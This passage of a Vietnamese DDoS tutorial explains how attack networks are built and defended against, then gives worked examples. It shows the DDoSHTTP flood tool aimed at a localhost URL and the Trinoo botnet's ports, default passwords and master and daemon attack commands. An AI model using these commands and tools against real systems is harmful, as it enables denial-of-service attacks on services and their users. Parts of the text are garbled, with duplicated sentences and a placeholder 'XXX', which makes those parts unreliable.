+ buffer Overflow: tận dụng lỗi buffer overflow, attacker có thể làm cho chu trình thực thi chương trình thông thường bị chuyển sang chu trình thực thi chương trình của hacker (nằm trong vùng dữ liệu ghi đè) Có thể dùng cách này để tấn công vào một chương trình có điểm yếu buffer overflow để chạy chương trình Agent software.

+ Bug Website: attacker có thể lợi dụng một số lỗi của web brower để cài Agent software vào máy của user truy cập Attaker sẽ tạo một website mang nội dung tiềm ẩn những code và lệnh để đặt bẫy user Khi user truy cập nội dung của website, thì website download và cài đặt Agent software một cách bí mật Microsoft Internet Explorer web browser thường là mục tiêu của cách cài đặt này, với các lỗi của ActiveX có thể cho phép IE brower tự động download và cài đặt code trên máy của user duyệt web.

+ Corrupted file: một phương pháp khác là nhúng code vào trong các file thông thường Khi user đọc hay thực thi các file này, máy của họ lập tức bị nhiễm Agent software Một trong những kỹ thuật phổ biến là đặt tên file rất dài, do default của các hệ điều hành chỉ hiển thị phần đầu của tên file nên attacker có thể gửi kèm theo email cho nạn nhân file như sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, do chỉ thấy phần “Iloveyou.txt” hiển thị nên user sẽ mở file này để đọc và lập tức file này được thực thi và Agent code được cài vào máy nạn nhân Ngoài ra còn nhiều cách khác như ngụy trang file, ghép file…

- Rootkit: là những chương trình dùng để xóa dấu vết về sự hiện diện của Agent hay Handler trên máy của nạn nhân Rootkit thường được dùng trên Hander software đã được cài, đóng vai trò xung yếu cho sự hoạt động của attack-network hay trên các môi trường mà khả năng bị phát hiện của Handler là rất cao Rootkit rất ít khi dùng trên các Agent do mức độ quan trọng của Agent không cao và nếu có mất một số Agent cũng không ảnh hưởng nhiều đến attack-network.

3.2/ Giao tiếp trên Attack-Network:

- Protocol: giao tiếp trên attack-network có thể thực hiện trên nền các protocol TCP, UDP, ICMP.

Tối thiểu hóa số lượng Agent

- Từ phía User: một phương pháp rất tốt để năng ngừa tấn công DDoS là từng internet user sẽ tự đề phòng không để bị lợi dụng tấn công hệ thống khác Muốn đạt được điều này thì ý thức và kỹ thuật phòng chống phải được phổ biến rộng rãi cho các internet user Attack-Network sẽ không bao giờ hình thành nếu không có user nào bị lợi dụng trở thành Agent Các user phải liên tục thực hiện các quá trình bảo mật trên máy vi tính của mình Họ phải tự kiểm tra sự hiện diện của Agent trên máy của mình, điều này là rất khó khăn đối với user thông thường.

Một số giải pháp tích hợp sẵn khả năng ngăn ngừa việc cài đặt code nguy hiểm thông ào hardware và software của từng hệ thống Về phía user họ nên cài đặt và updat liên tục các software như antivirus, anti_trojan và server patch của hệ điều hành.

- Từ phía Network Service Provider: Thay đổi cách tính tiền dịch vụ truy cập theo dung lượng sẽ làm cho user lưu ý đến những gì họ gửi, như vậy về mặt ý thức tăng cường phát hiện DDoSAgent sẽ tự nâng cao ở mỗi User :D

Tìm và vô hiệu hóa các Handler

Một nhân tố vô cùng quan trọng trong attack-network là Handler, nếu có thể phát hiện và vô hiệu hóa Handler thì khả năng Anti-DDoS thành công là rất cao Bằng cách theo dõi các giao tiếp giữa Handler và Client hay handler va Agent ta có thể phát hiện ra vị trí của Handler Do mộtHandler quản lý nhiều, nên triệt tiêu được một Handler cũng có nghĩa là loại bỏ một lượng đáng kể các Agent trong Attack – Network.

Phát hiện dấu hiệu của một cuộc tấn công

Có nhiều kỹ thuật được áp dụng:

- Agress Filtering: Kỹ thuật này kiểm tra xem một packet có đủ tiêu chuẩn ra khỏi một subnet hay không dựa trên cơ sở gateway của một subnet luôn biết được địa chỉ IP của các máy thuộc subnet Các packet từ bên trong subnet gửi ra ngoài với địa chỉ nguồn không hợp lệ sẽ bị giữ lại để điều tra nguyên nhân Nếu kỹ thuật này được áp dụng trên tất cả các subnet của internet thì khái nhiệm giả mạo địa chỉ IP sẽ không còn tồn tại.

- MIB statistics: trong Management Information Base (SNMP) của route luôn có thông tin thống kể về sự biến thiên trạng thái của mạng Nếu ta giám sát chặt chẽ các thống kê của protocol mạng Nếu ta giám sát chặt chẽ các thống kê của Protocol ICMP, UDP và TCP ta sẽ có khả năng phát hiện được thời điểm bắt đầu của cuộc tấn công để tạo “quỹ thời gian vàng” cho việc xử lý tình huống.

Làm suy giàm hay dừng cuộc tấn công

Dùng các kỹ thuật sau:

- Load balancing: Thiết lập kiến trúc cân bằng tải cho các server trọng điểm sẽ làm gia tăng thời gian chống chọi của hệ thống với cuộc tấn công DDoS Tuy nhiên, điều này không có ý nghĩa lắm về mặt thực tiễn vì quy mô của cuộc tấn công là không có giới hạn.

- Throttling: Thiết lập cơ chế điều tiết trên router, quy định một khoảng tải hợp lý mà server bên trong có thể xử lý được Phương pháp này cũng có thể được dùng để ngăn chặn khả năng DDoS traffic không cho user truy cập dịch vụ Hạn chế của kỹ thuật này là không phân biệt được giữa các loại traffic, đôi khi làm dịch vụ bị gián đoạn với user, DDoS traffic vẫn có thể xâm nhập vào mạng dịch vụ nhưng với số lượng hữu hạn.

- Drop request: Thiết lập cơ chế drop request nếu nó vi phạm một số quy định như: thời gian delay kéo dài, tốn nhiều tài nguyên để xử lý, gây deadlock Kỹ thuật này triệt tiêu khả năng làm cạn kiệt năng lực hệ thống, tuy nhiên nó cũng giới hạn một số hoạt động thông thường của hệ thống, cần cân nhắc khi sử dụng.

Chuyển hướng của cuộc tấn công

Honeyspots: Một kỹ thuật đang được nghiên cứu là Honeyspots Honeyspots là một hệ thống được thiết kế nhằm đánh lừa attacker tấn công vào khi xâm nhập hệ thống mà không chú ý đến hệ thống quan trọng thực sự.

Honeyspots không chỉ đóng vai trò “Lê Lai cứu chúa” mà còn rất hiệu quả trong việc phát hiện và xử lý xâm nhập, vì trên Honeyspots đã thiết lập sẵn các cơ chế giám sát và báo động.

Ngoài ra Honeyspots còn có giá trị trong việc học hỏi và rút kinh nghiệm từ Attacker, do Honeyspots ghi nhận khá chi tiết mọi động thái của attacker trên hệ thống Nếu attacker bị đánh lừa và cài đặt Agent hay Handler lên Honeyspots thì khả năng bị triệt tiêu toàn bộ attack-network là rất cao.

Giai đoạn sau tấn công

Trong giai đoạn này thông thường thực hiện các công việc sau:

-Traffic Pattern Analysis: Nếu dữ liệu về thống kê biến thiên lượng traffic theo thời gian đã được lưu lại thì sẽ được đưa ra phân tích Quá trình phân tích này rất có ích cho việc tinh chỉnh lại các hệ thống Load Balancing và Throttling Ngoài ra các dữ liệu này còn giúp Quản trị mạng điều chỉnh lại các quy tắc kiểm soát traffic ra vào mạng của mình.

- Packet Traceback: bằng cách dùng kỹ thuật Traceback ta có thể truy ngược lại vị trí củaAttacker (ít nhất là subnet của attacker) Từ kỹ thuật Traceback ta phát triển thêm khả năng Block

Traceback từ attacker khá hữu hiệu gần đây đã có một kỹ thuật Traceback khá hiệu quả có thể truy tìm nguồn gốc của cuộc tấn công dưới 15 phút, đó là kỹ thuật XXX.

- Bevent Logs: Bằng cách phân tích file log sau cuộc tấn công, quản trị mạng có thể tìm ra nhiều manh mối và chứng cứ quan trọng.

IV/ Những vấn đề có liên quan đến DDoS

DDoS là một kiểu tấn công rất đặc biệt, điểm cực kỳ hiểm ác của DDoS làm cho nó khắc phục là “DDos đánh vào nhân tố yếu nhất của hệ thống thông tin – con ngườ - mà lại là dùng người chống người” Từ đặc điểm này của DDoS làm phát sinh rất nhiều các vần đề mà mọi người trong cộng đồng Internet phải cùng chung sứ mới có thể giải quyết.

Thiếu trách nhiệm với cộng đồng

Con người thông thường chỉ quan tâm đầu tư tiền bạc và công sức cho hệ thống thông tin của

“chính mình” DDoS khai thác điểm này rất mạnh ở phương thức giả mạo địa chỉ và Broadcast amplification.

- IP spoofing: một cách thức đơn giản nhưng rất hiệu quả được tận dụng tối đa trong các cuộc tấn công DDoS Thực ra chống giả mạo địa chỉ không có gì phức tạp, như đã đề cập ở phần trên, nếu tất cả các subnet trên internet đều giám sát các packet ra khỏi mạng của mình về phương diện địa chỉ nguồn hợp lệ thì không có một packet giả mạo địa chỉ nào có thể truyền trên internet được. Đề nghị: “Tự giác thực hiện Egress Filtering ở mạng do mình quản lý” Hi vọng một ngày nào đó sẽ có quy định cụ thể về vấn đề này cho tất cả các ISP trên toàn cầu.

- Broadcast Amplification: tương tự IP spoofing, nó lợi dụng toàn bộ một subnet để flood nạn nhân Vì vậy, việc giám sát và quản lý chặt chẽ khả năng broadcast của một subnet là rất cần thiết.Quản trị mạng phải cấu hình toàn bộ hệ thống không nhận và forward broadcast packet.

Sự im lặng

Hầu hết các tổ chức đều không có phản ứng hay im lặng khi hệ thống của mình bị lợi dụng tấn công hay bị tấn công Điều này làm cho việc ngăn chặn và loại trừ các cuộc tấn công trở nên khó khăn Mọi việc trở nên khó khăn khi mọi người không chia sẻ kinh nghiệm từ các cuộc tấn công, trong khi giới hacker thì chia sẻ mã nguồn mở của các công cụ, một cuộc chơi không cân sức ?? Đề nghị:

+ Mỗi tổ chức có liên quan nên thiết lập quy trình xử lý xâm nhập vào tổ chức, nhóm chuyên trách với trách nhiệm và quy trình thật cụ thể Các ISP nên thiết lập khả năng phản ứng nhanh và chuyên nghiệp để hỗ trợ các tổ chức trong việc thực hiện quy trình xử lý xâm nhập của mình.

+ Khuyến khích các quản trị mạng gia nhập mạng lưới thông tin toàn cầu của các tổ chức lớn về bảo mật nhằm thông tin kịp thời và chia sẻ kinh nghiệm với mọi người

+ Tất cả các cuộc tấn công hay khuyết điểm của hệ thống đều phải được báo cáo đến bộ phận tương ứng để xử lý.

Tầm nhìn hạn hẹp

Nếu chỉ thực hiện các giải pháp trên thôi thì đưa chúng ta ra khỏi tình trạng cực kỳ yếu kém về bảo mật Các giải pháp này không thực sự làm giảm các rủi ro của hệ thống thông tin mà chỉ là các giải pháp tình thế Có những vấn đề đòi hỏi một cái nhìn và thái độ đúng đắn của cộng đồngInternet Cần phải có những nghiên cứu thêm về mặt quy định bắt buộc và pháp lý nhằm hỗ trợ chúng tac giải quyết các vấn đề mà kỹ thuật không thực hiện nỗi Một số vấn đề cần thực hiện thêm trong tương lai:

- Giám sát chi tiết về luồng dữ liệu ở cấp ISP để cảnh cáo về cuộc tấn công.

- Xúc tiến đưa IPSec và Secure DNS vào sử dụng

- Khẳng định tầm quan trọng của bảo mật trong quá trình nghiên cứu và phát triển của Internet II.

- Nghiên cứu phát triển công cụ tự động sinh ra ACL từ security policy và router và firewall.

- Ủng hộ việc phát triển các sản phẩm hướng bảo mật có các tính năng: bảo mật nặc định, tự động updat.

- Tài trợ việc nghiên cứu các protocol và các hạ tầng mới hỗ trợ khả năng giám sát, phân tích và điều khiển dòng dữ liệu thời gian thực.

- Phát triển các router và switch có khả năng xử lý phức tạp hơn

- Nghiên cứu phát triển các hệ thống tương tự như Intrusion Dectection, hoạt động so sánh trạng thái hiện tại với định nghĩa bình thường củ hệ thống từ đó đưa ra các cảnh báo.

- Góp ý kiến để xây dựng nội quy chung cho tất cả các thành phần có liên quan đến internet.

- Thiết lập mạng lưới thông tin thời gian thực giữa những người chịu trách nhiệm về hoạt động của hệ thống thông tin nhằm cộng tác-hỗ trợ-rút kinh nghiệm khi có một cuộc tấn công quy mô xảy ra.

- Phát triển hệ điều hành bảo mật hơn.

- Nghiên cứu các hệ thống tự động hồi phục có khả năng chống chọi, ghi nhận và hồi phục sau tấn công cho các hệ thống xung yếu.

- Nghiên cứu các biện pháp truy tìm, công cụ pháp lý phù hợp nhằm trừng trị thích đáng các attacker mà vẫn không xâm phạm quyền tự do riêng tư cá nhân.

- Đào tạo lực lượng tinh nhuệ về bảo mật làm nòng cốt cho tính an toàn của Internet.

- Nhấn mạnh yếu tố bảo mật và an toàn hơn là chỉ tính đến chi phí khi bỏ ra xây dựng một hệ thống thông tin.

V/ Một số ví dụ về tấn công DDos:

DDoS web bằng tool DDoSHTTP Đây là 1 công cụ kiểm tra performance & security & khả năng phục vụ đồng thời bao nhiêu HTTP Request của web server cũng như là kiểm tra độ bảo mật của Web Server chống lại các dạng tấn công Flood, DDoS HTTP.

Attacker chỉ cần nhập tên trang web đó rùi chọn start flood là xong.

 DDoSHTTP is an easy to use and powerful HTTP Flood Denial of Service (DDoS) TestingTool.

 DDoSHTTP includes URL Verification, HTTP Redirection, Port Designation, Performance Monitoring and Enhanced Reporting.

 DDoSHTTP uses multiple asynchronous sockets to perform an effective HTTP Flood. DDoSHTTP can be used simultaneously on multiple clients to emulate a Distributed Denial of Service (DDDoS) attack.

 DDoSHTTP can help IT Professionals test web server performance and evaluate web server protection software DDoSHTTP was developed by certified IT Security and Software Development professionals. b.Ví dụ minh họa :

Crash 1 website bằng DDoSHTTP để kiểm tra độ bảo mật của website.

Trong mục Target URL: điền địa chỉ website cần tấn công

(vd: http://localhost/products.php?id=0)

Website không thể phục vụ các HTTP Request và hiện ra thông báo giống như bên dưới.

- Attacker chỉ cần nhập tên trang web vào URL (vd: http://localhost/products.php?id=0)

- Sau đó chọn nhập số Threads

Ví dụ: Crash 1 website bằng HTTP Flooder để kiểm tra độ bảo mật của website.

Trinoo làm viêc dưới sự điều khiển từ xa,Attacker( dùng trương trình clien) sẽ gọi đến trương trình Master và nó chỉ dẫn cho Daemon tấn công Victim

The network: attacker(s) >master(s) >daemon(s) >victim(s)

| daemon | | daemon | | daemon | | daemon | | daemon |

Các cổng dùng để liên lac :

-Việc Điều khiển từ xa Trinoo master thông qua công 27665/TCP Sau khi kết nối attacker phải nhập vào password ("betaalmostdone").

-Liên lạc từ Trinoo Master đến Daemon thông qua công 27444/UDP

Command lines : arg1 password arg2 password mặc định sẽ là: "l44adsl"

-Liên lạc giữa Daemon và Master thông qua cổng 31355/UDP

-Khi Daemon khởi động, trước tiên nó sẽ gửi "*HELLO*" tới cho Master,trong khi trờ sự điều khiển cua Master.

CODEUDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335

-Nếu Master gửi lênh "png" đến cho Daemon trên cổng 27444/UDP thì Daemon sẽ trả lời lại bằng một chuỗi "PONG" trên cổng 31335/udp

UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444

UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335

-Khi muốn kết nối đến Remote command ( mặc định trên cổng 27665/tcp)

Connection closed by foreign host.

Escape character is '^]'. betaalmostdone trinoo v1.07d2+f3+c [rpm8d/cb4Sx/] trinoo>

Sau đây là một số pass măc định

CODE"l44adsl" trinoo daemon password

"gOrave" trinoo master server startup ("?? " prompt)

"betaalmostdone" trinoo master remote interface password

"killme" trinoo master password to control "mdie" command

CODEdie -Shutdown. quit -Log off. mtimer N -Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1 > 1999 giây dos IP -Tấn công đến một địa chỉ IP xác định mdie pass -Vô hiệu hoá tất cả các Broadcast , nếu như passwd chính xác Một lệnh đưọc gửi tới ("d1e l44adsl") Broadcast để Shutdown chúng Một passwd riêng biệt sẽ được đặt cho mục này mping -Gửi một lệnh ping tới ("png l44adsl") các Broadcast. mdos -Send nhiều lênh DOS ("xyz l44adsl 123:ip1:ip2") đến các Broadcast info -Hiển thị thông tin về Trinoo msize -Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS nslookup host -Xác định tên thiết bị của Host mà Master Trinoo đang chạy usebackup -Chuyển tớI các file Broadcast sao lưu được tạo bởi lệnh “killdead”. bcast -Liệt kê danh sách tất cả các Broadcast có thể khai thác help [cmd] -Đưa ra danh sách các lệnh mstop -Ngừng lại các cuốc tấn công DOS

CODE aaa pass IP -Tấn công đến địa chỉ IP đã xác định GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1 >1999 s bbb pass N -Đặt thờI gian giới hạn cho các cuộc tấn công DOS

Shi pass -Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP. png pass -Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP. die pass -Shutdown Trinoo. rsz N -Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte xyz pass 123:ip1:ip3 -tấn công DOS nhiều mục tiêu cùng lúc

4-Tribe Flood Network (TFN) Được viết bưởi 1 hacker có tên là: Mixter.Cũng gần giống Trinoo nó làm viêc dưới sự điều khiển từ xa,Attacker sẽ gọi đến trương trình clien và nó chỉ dẫn cho Daemon tấn công Victim:

The network: attacker(s) >client(s) >daemon(s) >victim(s)